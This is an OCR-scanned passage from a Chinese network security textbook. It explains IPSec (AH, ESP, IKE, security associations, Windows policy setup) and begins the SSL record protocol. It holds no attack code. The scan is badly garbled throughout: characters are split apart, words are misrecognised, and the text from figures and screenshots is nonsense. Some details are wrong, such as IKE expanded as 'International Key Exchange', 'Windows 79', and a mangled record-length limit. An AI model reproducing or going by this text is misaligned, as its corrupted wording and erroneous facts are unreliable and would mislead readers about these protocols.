IPSec 协议 ,也 称 为 IP 安全 协议 ,是 在 IP 层 增加 的 安全 补充 协议 ,通过 额外 的 报 文 头 
部 信息 实现 。 它 包括 三 个 方面 : 认证 ,保密 和 密 钥 管 理 。 认 证 确保 收 到 的 报 文 是 报 文 头 
部 信息 指定 的 发 送 方 发 出 ,同时 确保 报 文 在 传输 过 程 中 没有 被 臭 改 。 保 密 对 收发 双方 的 
报 文 进行 加 /解密 ,防止 第 三 方 窃听 。 密 钥 管 理 机 制 与 密 钥 交换 安全 有 关 。 

IPSec 提供 了 在 局 域 网 、 广 域 网 、 专 用 网 和 互联 网 中 安全 通信 的 功能 ,主要 用 途 包括 
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安全 远程 接 入 ,安全 的 企业 间 联 网 .加 强 电子 商务 安全 性 , 它 有 下 列 优点 : 
(1) 在 路 由 器 和 防火 墙 中 使 用 IPSec 时 ,可 以 对 通过 边界 的 信息 流 提供 强 安全 性 。 
(2) 位 于 传输 层 之 下 ,对 所 有 的 应 用 透明 , 即 无 论 终端 是 否 使 用 IPSec, 对 上 层 软件 和 
应 用 没有 影响 。 
(3) 对 终端 用 户 透明 ,不 需要 对 用 户 进 行 安 全 机 制 的 培训 。 
(4) 可 以 给 个 人 用 户 提供 安全 性 。 


10.2.1 IPSec 概述 


IPSec 是 IETF 设计 的 一 种 端 到 端的 IP 层 安 全 通信 机 制 ,由 一 组 协议 组 成 。 表 10-1 
列 出 了 IPSec 包含 的 所 有 协议 族 ,各 组 件 的 关系 如 图 10-6 所 示 。IPSec 包含 三 个 最 重要 
的 协议 , 即 鉴 别 头 部 协议 (Authenticated Header,AH) 封装 安全 载荷 协议 (Encapsulated 
Security Payload,ESP) 和 密 钥 交换 协议 (International Key Exchange,IKE) ,这 些 协 议 都 
可 以 独立 使 用 不 同 加 密 算法 。 

表 10-1 IPSec 协议 族 


和 安全 体系 结构 
2101 | IPSec 体系 结构 全 


2402| AH 协议 

HMAC-MD5-96 在 AH 和 ESP 中 的 
应 用 

HMAC-SHA-1-96 在 AH 和 ESP 中 的 
应 用 

2405| DES-CBC 在 ESP 中 的 应 用 

2406| ESP 协议 

2407 | IPSec DOI 

2408 | ISAKMP 协议 

2409| IKE 协议 密 钥 管理 协议 IKE 。 = 一 一 | 安全 关联 SA 
2410 | NULL 加 密 算法 及 其 在 IPSec 中 的 应 用 
2411 | IPSec 文档 路 线 图 

2412| OAKLEY 协议 10-6 IPSec 各 组 件 关系 图 
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AH 协议 实现 验证 ,包括 数据 完整 性 验证 、 发 送 方 身 份 认证 和 防止 重 放 攻 击 。ESP 除 
了 实现 AH 提供 的 服务 外 ,同时 提供 数据 加 密 。IKE 负责 密 钥 管理 ,定义 收发 双方 如 何 
进行 身份 认证 ,协商 加 密 算法 等 参数 和 生成 会 话 密 钥 。IKE 将 生成 的 会 话 密 钥 存储 在 安 
全 关联 (Security Association,SA) 中 ,随后 的 通信 过 程 中 可 以 在 AH 和 ESP 协议 报 文中 
使 用 会 话 密 钥 进行 加 密 。 解 释 域 (Domain of Interpretation,DODI) 为 使 用 IKE 进行 协商 
的 协议 统一 分 配 标识 符 ,包括 协 商 的 算法 .协议 标识 符 , 以 及 有 关 参 数 解释 。 

IPSec 存在 两 种 运行 模式 , 即 传 输 模式 和 隧道 模式 。 传 输 模式 保护 IP 报 文 的 内 容 ， 
一 般 用 于 两 台 主 机 之 间 的 安全 通信 。 隧 道 模式 保护 整个 IP 报 文 , 当 通 信 一 方 是 外 部 网 关 
时 ,通常 使 用 隧道 模式 ,可 以 用 来 隐藏 内 部 主机 的 IP 地 址 。 
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SA 是 在 两 个 IPSec 主机 之 间 经 过 协商 建立 的 一 种 协定 ,定义 众多 的 参数 信息 ,如 使 
用 的 IPSec 协议 运行 模式 、 加 密 算法 和 验证 算法 等 。SA 具有 单 向 性 ,每 个 通信 方 必 须 有 
两 个 SA, 分 别 对 应 发 送 和 接收 数据 。SA 通常 由 IKE 动态 建立 和 维护 ,当主 机 的 安全 策 
略 要 求 与 远 端 主机 建立 安全 连接 ,但 是 当前 不 存在 与 该 连接 相应 的 SA,IPSec 内 核 会 立 
即 启动 IKE 来 协商 SA。 

SA 存储 在 安全 关联 数据 库 SAD 中 ,每 个 SA 由 三 元 组 (SPI,IP 地 址 ,协议 ) 唯 一 标识 : 

(1) SPI(Security Parameter Index) : 安全 参数 索引 ,32 位 标识 符 ,唯一 地 表示 SA。 

(2) IP 地 址 : 对 于 发 送 SA ,表示 目标 IP 地 址 ; 对 于 接收 SA ,表示 源 IP 地 址 。 

(3) 协议 : AH 或 ESP。 

使 用 IPSec 发 送 报 文 时 , 它 首先 通过 SAD 根据 目标 IP 地 址 查找 SA ,如 果 不 存在 相 
应 SA 则 启动 IKE 协商 建立 一 个 新 的 SA, 并 存储 到 SAD 中 ,如 果 存 在 则 直接 用 使 用 该 
SA 对 应 的 参数 发 送 数 据 。 使 用 IPSec 接收 报 文 时 ,从 报 文中 取出 三 元 组 ,利用 SPI 在 
SAD 中 查找 相应 的 SA 并 提取 参数 ,对 报 文 做 相应 处 理 。 

安全 策略 (Security Policy,SP) 定 义 如 何 处 理 收发 的 报 文 ,根据 源 或 目标 IP 地 址 、 源 
或 目标 端口 以 及 发 送 还 是 接收 数据 来 标识 ,所 有 的 SP 保存 在 安全 策略 数据 库 (Security 
Policy Database,SPD) 中 ,通常 有 三 种 类 型 的 策略 : 

(1) 丢弃 : 不 转发 报 文 ,不 从 主机 发 出 ,也 不 发 送 给 应 用 程序 ,在 IP 层 直接 丢弃 。 

(2) 不 用 IPSec: 将 报 文 当成 普通 报 文 处 理 , 不 需要 额外 的 IPSec 保护 。 

(3) 使 用 IPSec: 保护 报 文 ,采用 SAD 中 的 某 个 SA 进行 保护 。 


10.2.2 AH 协议 


AH 协议 提供 数据 完整 性 保护 和 发 送 方 身份 验证 ,使 用 HMAC 消息 认证 机 制 ,IPSec 
包括 两 种 HMAC 算法 , 即 HMAC-MD5-96 和 HMAC-SHA-1-96, 分 别 基于 MD5 和 
SHA-1 散 列 算法 。AH 验证 整个 IP 报 文 信息 ,不 提供 加 密 服务 , 当 报 文 验证 失败 时 ,将 
丢弃 该 报 文 ,不 会 转发 给 上 层 协议 解密 。 

AH 协议 在 IP 头 部 的 协议 字段 中 标记 为 51 ,在 传输 模式 下 ,AH 报 文 在 IP 头 部 和 数 
据 之 间 插 入 。 在 隧道 模式 下 ,原始 IP 分 组 作为 隧道 报 文 的 数据 ,AH 在 外 层 IP 头 部 和 隧 
道 数 据 之 间 插 入 ,如 图 10-7 所 示 。 每 个 实现 传输 模式 的 主机 无 法 使 用 私有 地 址 ,必须 安 
装 IPSec 协议 ,因此 AH 协议 对 终端 用 户 不 透明 。 相 反 ,隧道 模式 使 得 内 网 所 有 用 户 可 以 
透明 享受 安全 网 关 提 供 的 IPSec 服务 ,内 网 主机 无 须 安装 IPSec 协议 ,也 可 以 使 用 私有 
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IP 头 部 | 数据 IP 头 部 数据 
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(a) 传输 模式 (b) 隧道 模式 
图 10-7 AH 协议 报 文 格式 
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AH 协议 的 报 文 格式 如 图 10-8 所 示 , 各 个 字段 含义 如 下 : 

(1) 下 一 个 头 部 : 表示 AH 封装 的 协议 报 文 类 型 ,如 果 是 传输 模式 ,从 IP 头 部 的 协 
议 字 段 中 复制 ,如 6(TCP) 、17(UDD 或 50(ESP) ,如 果 是 隧道 模式 ,该 值 为 4。 

(2) 认证 头 部 长 度 : 以 32 位 为 单位 的 AH 总 长 度 , 实 际 长 度 为 总 的 长 度 减 2。 例 如 ， 
采用 96 位 认证 数据 ,那么 认证 长 度 为 6 个 32 位 字 , 减 去 2 后 ,认证 头 部 长 度 值 为 4。 

(3) 安全 参数 索引 SPI: 接收 方 根据 SPI\ 源 IP 地 址 和 IP 头 部 中 的 协议 类 型 值 确 定 
相应 的 接收 SA。 

(4) 认证 数据 : 消息 认证 码 ,用 于 认证 发 送 方 身份 ,进行 完整 性 检测 , 它 的 生成 算法 
由 SA 指定 。 

(5) 序号 : 单调 递增 的 计数 器 ,为 每 个 AH 报 文 赋予 不 同 的 序号 ,用 于 防止 重 放 
攻击 ; 通信 双方 建立 SA 时 ,初始 化 为 0, 每 次 发 送 或 接收 一 个 报 文 ,SA 的 计数 器 增 
加 1。 

















8 位 8 位 16 位 
下 一 个 头 部 | 认证 头 部 长 度 | 保留 
安全 参数 索引 (SP 
序号 
认证 数据 








图 10-8 认证 首部 (AH) 格 式 


AH 在 计算 认证 数据 时 覆盖 AH 报 文 的 下 列 字段: 

(1) IP 头 部 (隧道 模式 下 是 外 层 IP 头 部 ) 中 无 须 改变 的 字段 值 ,如 源 和 目标 IP, 但 是 
TTL 之 类 的 字段 就 不 做 认证 ,因为 它 每 经 过 一 个 路 由 器 就 会 减少 1。 

(2) AH 中 除了 认证 数据 外 的 其 他 5 个 字段 值 。 

(3) IP 报 文 的 数据 部 分 ,如 果 是 隧道 模式 , 则 验证 包括 内 层 IP 头 部 在 内 的 所 有 数据 
部 分 。 

如 果 攻 击 者 在 传输 过 程 中 算 改 了 某 个 覆盖 的 字段 值 ,接收 方 重新 计算 得 到 的 认证 数 
据 与 AH 中 的 认证 数据 不 会 相同 , 即 可 确定 该 报 文 被 算 改 过 了 。IPSec 可 以 选择 MD5 或 
SHA-1 作为 散 列 算法 实现 HMAC, 然 后 从 中 截取 96 位 作为 认证 数据 ,要 求 收发 双方 必 
须 采 用 相同 的 算法 和 MAC 密 钥 。 


10.2.3 ESP 协议 


ESP 协议 提供 数据 完整 性 验证 和 发 送 方 身份 认证 的 原理 与 AH 相同 ,但 是 ESP 计算 
认证 数据 时 覆盖 的 字段 更 少 , 仅 包 括 ESP 头 部 、 数 据 部 分 和 ESP 尾部 。 另 外 ,ESP 还 提 
供 加 密 功 能 ,采用 对 称 加 密 算 法 ,ESP 协议 规定 所 有 的 IPSec 系统 必须 至 少 实现 DES- 
CBC 算法 ,但 常用 加 密 算法 是 3DES。 


@ ”如果 内 网 用 户 经 过 NAT 转换 ,那么 接收 方 会 报告 AH 验证 失败 ,因此 AH 无 法 与 NAT 共存 。 
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ESP 协议 在 IP 头 部 的 协议 字段 的 标识 是 50,ESP 封装 IP 报 文 的 方式 如 图 10-9 所 
示 。 在 传输 模式 ,ESP 头 部 在 IP 头 部 和 数据 之 间 插 入 ,ESP 尾部 和 消息 认证 码 添 加 在 原 
始 IP 报 文 数据 的 尾部 。 在 隧道 模式 ,ESP 头 部 在 外 层 IP 头 部 和 内 层 IP 头 部 之 间 插 入 ， 
ESP 尾部 和 消息 认证 码 添 加 在 原始 IP 报 文 数 据 的 尾部 。 封 装 后 ,整个 IP 报 文 的 数据 部 
分 就 是 ESP 报 文 。ESP 报 文 的 格式 如 图 10-10 所 示 ,分 为 ESP 头 部 ,数据 、ESP 尾部 和 消 
息 认证 码 。ESP 头 部 包括 安全 参数 索引 (SPT) 和 序列 号 ,ESP 尾部 包括 填充 项 、 填 充 长 度 
和 下 一 个 头 部 字段 ,各 个 字段 的 具体 含义 如 下 : 

(1) SPI: 32 位 标识 符 , 接 收 方 根据 SPI、 源 IP 地 址 和 IP 头 部 中 的 协议 类 型 值 确定 相 
应 的 接收 SA。 

(2) 序号 : 单调 递增 的 计数 器 ,为 每 个 ESP 报 文 赋予 不 同 的 序号 ,用 于 防止 重 放 攻 
击 ; 通信 双方 建立 SA 时 ,初始 化 为 0, 每 次 发 送 或 接收 一 个 报 文 ,SA 的 计数 器 增加 1 。 

(3) 填充 项 : 可 选 字 段 ,一 是 为 了 对 齐 加 密 数据 ,填充 到 4 字 节 边界 ; 二 是 在 加 密 数 
据 时 ,保证 数据 加 上 ESP 尾部 的 长 度 是 分 组 加 密 的 分 组 长 度 的 整数 们 ,如 DES 加 密 算法 
的 分 组 长 度 为 64 位 ,就 要 填充 数据 部 分 使 得 对 齐 8 字 节 边界 。 

(4) 填充 长 度 : 指定 填充 项 包括 几 字 节 ,范围 为 [0 一 255] 。 

(5) 下 一 个 头 部 : 表示 ESP 封装 的 协议 报 文 类 型 ,如 果 是 传输 模式 ,从 IP 头 部 的 协 
议 字 段 中 复制 ,如 6(TCP) .17(UDI) 或 51(AH) ,如果 是 隧道 模式 ,该 值 为 4。 

(6) 消息 认证 码 : ESP 计算 认证 数据 时 生成 的 消息 认证 码 。 


[Le 部 | 数据 ] [LP 部 | 数据 | 
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传输 模式 隧道 模式 
图 10-9 ESP 协议 报 文 格式 
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ESP 头 部 序号 
加 密 数据 
加 密 
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ESP 尾 部 
填充 项 |。 填充 长 度 | 下 一 个 头 部 
认证 数据 (可 选 ) ESPMAC 





图 10-10 ”ESP 封装 格式 


在 传输 模式 ,ESP 加 密 运算 覆盖 的 字段 是 数据 部 分 和 ESP 尾部 ,不 会 对 ESP 头 部 进 
行 加 密 。 因 为 在 接收 方 ,SPI` 源 IP 地 址 和 ESP 协议 号 用 于 唯一 确定 SA ,需要 利用 该 SA 
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进行 解密 ,如 果 SPI 被 加 密 , 那 么 无 法 找到 对 应 的 SA, 也 就 无 法 解密 。 序 列 号 也 无 须 加 
密 , 它 不 会 泄露 报 文中 的 信息 ,也 使 得 接收 方 容易 判断 报 文 是 否 是 重复 报 文 。 认 证 数据 也 
不 会 加 密 ,因为 接收 方 在 解密 数据 之 前 就 要 进行 验证 。 

在 隧道 模式 ,ESP 加 密 运算 覆盖 整个 内 层 IP 报 文 ,外 层 IP 头 部 既 不 加 密 也 不 验证 ， 
不 加 密 是 因为 路 由 器 需要 外 层 IP 进行 路 由 选择 ,不 验证 是 使 得 ESP 可 以 适用 NAT 转 
换 , 所 以 ESP 不 像 AH 那样 会 与 NAT 服务 冲突 。 即 使 通信 双方 都 具有 私有 地 址 ,依然 
可 以 采用 ESP 进行 安全 通信 。 

AH 和 ESP 协议 可 以 嵌 套 使 用 ,首先 用 ESP 对 原始 报 文 进行 加 密 ,然后 用 AH 进行 
完整 性 计算 , 即 把 AH 头 插入 了 P 头 部 和 ESP 头 部 之 间 , 接 收 方 首先 进行 完整 性 验证 , 然 
后 再 进行 解密 。 表 10-2 列 出 了 AH 和 ESP 在 不 同 模式 下 的 功能 对 比 。 


表 10-2 AH 和 ESP 功能 对 比 

















协 议 传输 模式 隧道 模式 
AH 认证 IP 数据 、IP 头 部 的 一 部 分 “| 认证 内 层 IP 报 文 .外 层 IP 头 部 的 一 部 分 
不 带 认证 的 ESP 加 密 IP 数据 和 ESP 尾部 加 密 内 层 IP 报 文 和 ESP 尾部 
除 加 密 外 ,认证 ESP 头 部 .数据 | 除 加 窗外 ,认证 ESP 头 部 .数据 和 ESP 
ES 和 ESP 尾部 尾部 


10.2.4 ”IKE 协议 


IPSec 在 保护 一 个 IP 报 文 之 前 ,需要 预先 建立 安全 关联 SA。IKE(Internet Key 
Exchange) 是 IPSec 用 于 密 钥 管 理 的 协议 , 它 负 责 自 动 管理 SA 的 建立 ,删除 修改 和 协 
商 。IKE 是 一 个 混合 型 的 协议 , 它 使 用 ISAKMP 协议 框架 .OAKLEY 密 钥 交换 模式 以 
及 SKEME 的 共享 和 密 钥 更 新 技术 。ISAKMP( 安 全 关联 密 钥 管理 协议 ) 只 为 SA 的 属性 
和 用 法 提供 了 通用 框架 ,并 未 定义 具体 的 SA 格式 ,也 没有 定义 任何 密 钥 交换 协议 的 细 
节 、 具 体 的 加 密 算法 和 认证 机 制 。IKE 在 ISAKMP 框架 中 定义 使 用 OAKLEY 算法 进行 
密 钥 交换 ,可 以 理解 为 JISAKMP 框架 的 一 个 实例 。 

IKE 的 特点 是 它 不 会 在 网 络 上 直接 传递 密 钥 ,而 是 通过 计算 得 出 双方 的 共享 密 钥 ， 
即使 攻击 者 截获 用 于 计算 密 钥 的 所 有 交换 数据 ,也 无 法 计算 出 真正 的 密 钥 。IKE 使 用 两 
阶段 协议 来 为 收发 双方 建立 SA ,第 一 阶段 ,协商 并 创建 一 个 安全 通信 信道 (IKE SA) ,并 
对 该 信道 进行 验证 ,为 双方 进一步 的 通信 提供 保密 性 、 完 整 性 和 身份 验证 服务 ; 第 二 阶 
段 , 用 已 建立 的 IKE SA 来 建立 IPSec SA。 

第 一 个 阶段 有 两 种 实现 模式 , 即 主 模式 和 野蛮 模式 。 主 模式 交换 提供 了 身份 保护 机 
制 , 经 过 3 个 步骤 ,总 共 交 换 了 6 条 消息 ,分别 是 策略 协商 交换 .Diffie_Hellman 密 钥 交换 
以 及 身份 验证 交换 ,如 图 10-11 所 示 。IKE 以 保护 组 (Protection Suite) 的 形式 定义 IKE 
SA ,每 个 保护 组 至 少 需要 定义 采用 的 加 密 算法 (3DES) 、 散 列 算法 (MD5) 、Diffie-Hellman 
组 (第 2 组 ) 以 及 验证 方法 (使 用 DSA 数字 签名 ) 。IKE 的 策略 数据 库 按 各 个 参数 的 顺序 
列 出 了 所 有 保护 组 ,在 收发 双方 协商 好 特定 策略 组 以 后 ,随后 的 通信 必须 根据 IKE SA 进 
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行 。 密 钥 交 换 仅 交换 Diffie-Hellman 算法 生成 共享 密 钥 所 需 的 基本 信息 和 随机 数 Nonce 




















(用 于 防止 重 放 攻击 ) ,双方 生成 相同 的 共享 密 钥 ,保护 第 三 步 的 身份 验证 过 程 。 身 份 验证 
过 程 对 Diffie-Hellman 共享 密 钥 进行 验证 ,同时 还 要 对 IKE SA 本 身 进行 验证 ,共享 密 钥 
结合 第 一 步 确定 的 协商 算法 对 收发 双方 进行 认证 。 
3DES 、 HMAC_MDS. 96; Diffie-Hellmar 2, DSA 
A 
3DES、 HMAC _ MDS5_96, Diffie_Hellman_2, DSA 
L 同意 该 SA 
Ys,Noncel | 
发 送 方 接收 方 
A L Ys,Noncel,Ye,Nonce2 B 
IDa, 3DESke,y(SA, Ya,Ya,Noncel,Nonce2, IDA) 
DSAsk, (MDS5(SA, Fa,Ye,Noncel,Nonce?2, IDA)) | 
IDep,3DESkey(SA, FYe,Noncel,Nonce2, 1DB) 
本 DSAska(MDS(SA, 内 ,Je,Noncel,Nonce2, IDs)) 














图 10-11 IKE 第 一 阶段 的 主 模式 交换 过 程 


野蛮 模式 交换 也 分 为 三 个 步骤 ,但 是 只 交换 三 条 消息 。 头 两 条 消息 协商 策略 ,交换 
Diffie-Hellman 协议 必需 的 辅助 数据 以 及 身份 信息 ,第 二 条 消息 同时 认证 响应 方 ,第 三 条 
消息 认证 发 起 方 。 需 要 注意 的 是 ,IKE SA 是 双向 的 ,只 有 一 个 ; 而 IPSEC SA 是 单 向 的 ， 
每 个 方向 都 有 一 个 。 

第 二 阶段 交换 是 快速 模式 交换 ,通过 三 条 消息 建立 IPSec SA ,前 两 条 用 于 协商 IPSec 
SA 的 各 项 参数 值 ,并 生成 IPSec 使 用 的 密 钥 ,第 二 条 消息 还 为 响应 方 提供 身份 证 明 ,第 三 
条 消息 验证 发 送 方 ,如 图 10-12 所 示 。 

SA=(3DES 、HMAC_MD5_96, Diffie_Hellman_2, DSA), 


SPLIDA, IDs, Noncel, Yh, 
DSAsx (MDS(SPI, SA, IDA, IDg, Noncel, 7,)) 





SA=(3DES 、HMAC_MD5_96. Diffie_Hellman_2, DSA), 
SPI, IDA, IDa, Noncel, ¥,Nonce2, Ye, 
发 送 方 | DSAsks(MD5(SPL SA. IDA, IDB. Noncel, Y,,Nonce2, Ye)) 接收 方 
B 





SA=(3DES 、HMAC_MD5_96,. Diffie_Hellman_2, DSA), 
SPI, IDA, IDe, Noncel, YA,Nonce2, Ys, 
DSAsxk, (MDS5(SPI, SA, IDA, IDa, Noncel, Ya,Nonce2, Ye)) 











图 10-12 IKE 第 二 阶段 快速 模式 交换 


总 之 ,IKE 可 以 动态 建立 SA 和 共享 密 钥 ,但 是 它 的 实现 非常 复杂 ,容易 成 为 整个 系 
统 的 性 能 瓶颈 。 
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10.2.5 IPSec 应 用 


Windows 79 本 地 安全 策略 组 件 中 集成 了 IPSec 协议 ,允许 两 台 主 机 之 间 使 用 IPSec 
协议 进行 安全 通信 (图 10-13) 。 用 户 首先 按照 源 和 目标 IP 地 址 、 源 和 目标 端口 .协议 号 分 
类 设置 IP 筛选 器 ,然后 设置 不 同 的 SA 参数 集 ( 即 筛选 器 操作 ) ,提供 给 不 同 的 IP 安全 策 
略 使 用 。IP 筛选 器 和 SA 参数 集合 用 于 设置 不 同 的 IPSec SA 和 IKE SA( 图 10-14) 。 每 
个 了 安全 策略 可 以 共享 使 用 所 有 预定 义 的 筛选 器 和 筛选 器 操作 。 


















天生 全 作 季 创 寻 其 才 扩 定 久 你 的 网 站 安生 的 好 过 内 


XX 





所 有 IP 安全 策略 共享 可 用 的 往 选 器 操作 。 





所 有 IP 安全 策略 都 共享 这 些 可 用 的 IP wi 
以 IP 地 址 和 协议 端口 对 应 SPI 
IP 入选 回 列表 (L) : 

名 称 








第 选 器 操作 (E) : 








描述 





























国 售 用 “添加 向 


nN 


| 至 加 四.… | 续 拖 四 .| 副 除 () 
10-14 IPSec 设置 筛选 器 和 筛选 器 操作 








图 10-15 列 出 了 SA 参数 的 具体 配置 ,包括 该 SA 对 应 的 动作 ,选择 何 种 加 密 和 验 
证 算法 ,以 及 何 种 协议 等 信息 。 图 10-16 列 出 一 个 筛选 器 示例 表示 匹配 目标 地 址 为 


中 ”Windows 7 家 庭 版 不 支持 本 地 安全 策略 设置 。 
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192. 168. 2. 201 的 任何 协议 和 任何 端口 的 IP 报 文 。 图 10-17 定义 一 个 SP, 针 对 名 为 
“test1” 的 IP 筛选 器 ,使 用 名 为 “SA 策略 1” 定 义 的 SA 参数 集合 ,身份 验证 方式 使 用 预 共 
享 密 钥 (也 可 以 选择 数字 签名 或 Kerberos 协议 ) ,采用 传输 模式 进行 安全 通信 。 需 要 注意 
的 是 ,通信 双方 必须 基于 各 自 的 IP 筛选 器 选择 同样 的 SA 参数 集合 、 身 份 验证 方式 和 运 
行 模式 , 才 可 以 成 功 通信 。 





































































安全 方法 Ez 
站 许可 0 
辐 蛆 止 (D) pSec9Sp 设 于 必 完整 性 和 加 而 (E) 
回 协商 安全 (0 ] 传送 的 数据 将 被 加 韦 ， 验 证 为 可 信 的 并 且 没有 被 更 改 。 
后 : 加 仅 保持 完整 性 (1) 
类 型 Ah 完 ..，ESP 机 ..。 ESP ... 帝 钥 ..， 从 
人 a [mw... | 信 洋 的 数据 疹 补 是 为 可 信 并 且 没有 说 更 改 ， 但 不 会 裕 如 
Ce 回 自 定义 (C) 
区 sa 指定 此 自 定义 安全 方法 的 设置 。 
上 称 四 加 某所 和 地 必 下 如 归 的 完 玖 人 OA (A); 
4 避 Ceo CT = 
加 接受 不 安全 的 通信 ， 但 始终 用 IPsec 响应 (C) 网 数据 完整 性 和 加 密 (ESP) (C) : 
回 如 果 无 法 建立 安全 连接 ， 则 允许 回 退 到 不 安全 的 通信 (了 完整 性 算法 (N) : 
SA 的 闫 敌 设 置 
国 使 用 会 话 密 铀 完全 向 前 保密 (PFS) (K) a 
加 密 算法 (E) : 
(a) (b) 


图 10-15 IPSec SA 参数 具体 设置 方法 





过 IP 筛选 器 列表 由 多 个 筛选 器 组 成 。 这 样 ， 多 个 子 网 、IP 地 址 和 协议 可 被 整 


合 到 一 个 IP 第 选 器 中 。 


























名 称 (N) 
testl 
描述 (D) 添加 人) 
- 
ed 删除 BR) | 
IP 和 萌 选 器 (9) : 了 财 使 用 “添加 向 导 ”(WD 
源 DNS ... 源 地 址 目标 DN... 目标 地 址 源 端 口 目标 端口 ”协议 
《任何 工 .. 《任何 IP 地 址 ” 《一 个 特 ... 192.168.2.201 任何 任何 任何 





























10-16 IPSec 筛选 器 设置 示例 


使 用 IPSec 必须 修改 和 扩展 卫 协议 栈 ,需要 在 内 存 中 进行 各 种 完整 性 验证 .加 /解密 
运算 ,容易 导致 系统 性 能 下 降 。 使 用 IPSec 会 增加 IP 报 文 头 部 长 度 . 同 时 IKE 协议 的 运 
行 也 会 消耗 一 定 带宽 ,因此 会 导致 路 由 器 等 Internet 基础 设施 的 负载 上 升 。 

IPSec 本 意 希 望 在 IP 层面 解决 TCP/IP 协议 族 的 安全 问题 ,而 不 需要 在 传输 层 或 应 
用 层 考虑 ,但 是 目前 而 言 并 不 成 功 ,实际 上 SSL 和 SSH 等 协议 应 用 更 加 广泛 。 主 要 原因 
在 于 IPSec 增加 了 路 由 器 的 负担 ,很 难得 到 网 络 运营 商 的 支持 ,还 有 就 是 IPSec 自身 过 于 
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规则 “这 规 








司 胃 “和 其 他 计算 机 信 的 安全 如 则 





IP 去 全 规则 (D : 
JP 筛选 器 列表 短 选 器 操作 身份 验证 方法 隧道 终结 点 
回 | 





默认 响应 (.. 。 Kerberos 




















0 Fe | 攻 昌隆 Ga 网 售 用 5 汪 加 内 





图 10-17 IPSec 的 安全 策略 示例 


复杂 ,使 得 其 应 用 过 程 中 出 现 不 少 问题 。 
10.3 SSL 协议 


安全 套 接 层 协议 (Secure Socket Layer,SSL) 最 早 由 网 景 公司 (Netscape) 推 出 ,指定 
了 一 种 在 应 用 层 协 议和 TCP/IP 协议 之 间 提 供 数 据 安全 性 的 机 制 ,为 TCP/IP 连接 提供 
保密 性 、 完 整 性 、 服 务 器 认证 和 可 选 的 客户 机 认证 ,主要 用 于 实现 Web 服务 器 和 浏览 器 之 
间 的 安全 通信 ,目前 的 工业 标准 是 SSL v3。 

图 1-12 给 出 了 SSL 协议 栈 的 组 成 ,SSL 是 介 于 HTTP 协议 和 TCP 协议 之 间 的 可 选 
层 ,使 用 TCP 提供 一 种 可 靠 的 端 到 端 安全 服务 , 它 独立 于 应 用 层 , 从 而 使 绝 大 多 数 应 用 层 
协议 都 可 以 直接 建立 在 SSL 之 上 。SSL 假定 下 层 协议 是 可 靠 的 报 文 发 送 协议 , 它 的 目标 
是 在 通信 双方 之 间 利 用 加 密 的 SSL 信道 建立 安全 连接 。 它 不 是 单独 的 一 个 协议 ,而 是 由 
两 层 协 议 组 成 。 

SSL 记录 协议 为 应 用 层 协 议 提供 基本 的 安全 服务 ,HTTP 一 般 在 SSL 的 记录 协议 的 
上 层 实现 。 另 外 三 个 高 层 协议 分 别 是 SSL 握手 协议 ,SSL 更 改 密码 规范 协议 (Change 
Cipher Spec ProtocoD) 和 SSL 报警 协议 (Alert Protocol) 。 

SSL 握手 协议 用 于 在 客户 机 和 服务 器 之 间 建 立 安全 连接 前 ,预先 建立 一 个 连接 双方 
的 安全 通道 ,并 且 能 够 通过 特定 的 加 密 算法 互相 鉴别 。SSL 记录 协议 用 于 封装 更 高 层 的 
协议 ,执行 数据 的 安全 传输 ， 

SSL 结合 对 称 加 密 和 公 钥 加 密 技 术 ,在 握手 协议 中 使 用 公 钥 算法 在 客户 端 验证 服务 
器 的 身份 ,并 传递 客户 端 产生 的 对 称 会 话 密 钥 ,然后 SSL 记录 协议 再 用 会 话 密 钥 来 加 / 解 
密 数据 ,实现 了 保密 性 、 完 整 性 和 身份 认证 服务 。 

在 实际 使 用 时 ,SSL 协议 将 基于 证 书 的 认证 方法 和 基于 口令 的 认证 方法 完美 结合 起 
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来 ,在 握手 时 ,必须 进行 服务 器 认证 ,但 是 不 需要 CA 实时 参与 ,也 无 须 查询 证 书库 ,因此 
CA 不 会 成 为 瓶 代 。 客 户 认证 是 可 选 的 ,因为 可 以 在 建立 起 SSL 信道 后 ,再 用 协商 好 的 会 
话 密 钥 加 密 传输 口令 来 实现 客户 机 认证 。 如 果 强 制 要 求 客 户 认 证 ,每 个 客户 必须 分 配 数 
字 证 书 , 代 价 相对 较 高 。 由 于 不 强制 客户 必须 有 数字 证 书 ,SSL 无 法 对 应 用 程序 的 消息 
进行 签名 ,因此 不 能 提供 不 可 否认 性 。 

SSL 更 改 密码 规范 协议 是 一 个 比较 简单 的 协议 ,只 包含 一 条 长 度 为 1 字 节 的 消息 ,用 
于 设置 当前 状态 和 当前 密 钥 组 ,表明 相应 的 加 密 策略 已 经 设置 。 

SSL 报警 协议 用 于 握手 协议 或 数据 加 密 等 操作 出 错时 ,向 对 方 传递 报警 信息 或 者 终 
止 当前 连接 , 它 的 数据 有 两 个 字 节 , 即 报警 级 别 和 报警 代码 ,报警 级 别 分 为 "warning” 和 
“fatal” 两 种 ,fatal 类 型 的 报警 会 导致 连接 立即 终止 。 


10.3.1 SSL 记录 协议 


SSL 记录 协议 描述 SSL 信息 交换 过 程 中 的 记录 格式 ,提供 数据 加 密 和 数据 完整 性 验 
证 等 功能 。 一 个 记录 由 两 部 分 组 成 , 即 记录 头 部 和 数据 (图 10-18)。SSL 记录 头 部 包括 : 

(1) 内 容 类 型 : 8 比特 ,表示 上 层 协议 类 型 ,如 更 改 密码 规范 协议 是 20, 报 警 协 议 是 
21 ,握手 协议 是 22 。 

(2) 协议 版 本 : 16 比特 ,表明 SSL 版 本 号 ,高 8 位 是 主 版 本 号 , 低 8 位 是 次 版 本 号 。 

(3) 数据 长 度 : 原始 报 文 中 的 数据 长 度 , 如 果 经 过 压缩 , 则 是 压缩 后 的 长 度 。 


压缩 后 数据 
加 密 





MAC 





图 10-18 ”SSL 记录 协议 格式 


上 层 数据 的 长 度 可 以 任意 ,但 是 压缩 后 的 数据 长 度 不 能 超过 25 一 1 个 字 节 。 当 单个 
记录 协议 报 文 无 法 装 下 上 层 协 议 报 文 时 ,必须 
对 上 层 报 文 分 段 ,保证 每 段 报 文 能 够 封装 成 单 
个 记录 协议 报 文 。 消 息 认 证 码 (MAC) 根 据 压 
缩 后 的 数据 计算 ,加 密 算法 同时 覆盖 压缩 数据 
和 消息 认证 码 。SSL 握手 协议 的 报 文 必须 装 
在 一 个 SSL 记录 里 ,而 应 用 层 协议 的 报 文 可 
以 分 别 装 在 多 个 SSL 记录 中 。SSL 记录 协议 
的 操作 步骤 如 图 10-19 所 示 。 首 先 将 数据 分 
